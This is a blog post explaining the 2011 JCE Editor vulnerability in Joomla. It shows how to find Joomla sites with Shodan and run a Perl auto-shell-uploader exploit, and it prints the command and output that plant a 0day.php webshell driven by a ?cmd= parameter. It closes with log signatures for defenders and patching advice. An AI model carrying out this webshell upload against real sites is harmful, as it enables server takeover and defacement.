Maybe everyone knows this attack because it was discovered in August 2011. I think it's very interesting because each day there are more and more IPS/IDS alerts.

If we take a look at zone-h.org website, we can see the guys like Hmei7 are hacking Joomla's websites with a JCE Editor Vulnerability every day, every minute...


It's possible that one day, when you go to your Joomla Website, you will see something like this:



How can we take advantage of the JCE Editor Weakness?


If you are using Joomla with JCE 2.0.10 (prior versions may also be affected) your website is at risks.

AmnPardaz Security Research & Penetration Testing Group published two scripts in PHP and Perl after releasing a vendor supplied patch for JCE's vulnerabilitie.

You can get those exploits scripts here.
 
Now, We are going to hack our own website... ;)

First of all, we need to locate a Joomla installation on Shodan: http://www.shodanhq.com/search?q=joomla

Then, we run the perl exploit in our Linux machine:
behindthefirewalls.blogspot.com@Hacking:~$ perl jce.pl xxx.com


    .::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.

    ||||        Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)      ||||


[*] Checking Exploitability ...

[*] Trying to upload 0day.gif ...

[*] Trying to change extension from .gif to .php ...

[+] 0day.php was successfully uploaded

[+] Path:xxx.com/images/stories/0day.php?cmd=id

Finally, if you get the Path, you can check if the server has been hacked. If you visit...
http://xxx.com/images/stories/0day.php?cmd=id

You will see...


In this case, we have modified the script for printing our name in the webserver.
If  your are a Security Engineer, you should check in the web server logs, something like:
POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1
Head //images/stories/0day.php HTTP/1.1
If you have a Snort IDS, you will see the next Snort Events...





Int the last few days, many clients have benn called me asking about these attacks. The reponse is, recover a backup of your site and updgrade to JCE 2.0.11 release.

Also, you can exploit this vulnerability with Mestasploit



You can learn how to fix this vulnerability here.

If you want to know who Hmei7 is visit this website

Great explanation by Josh Pate here.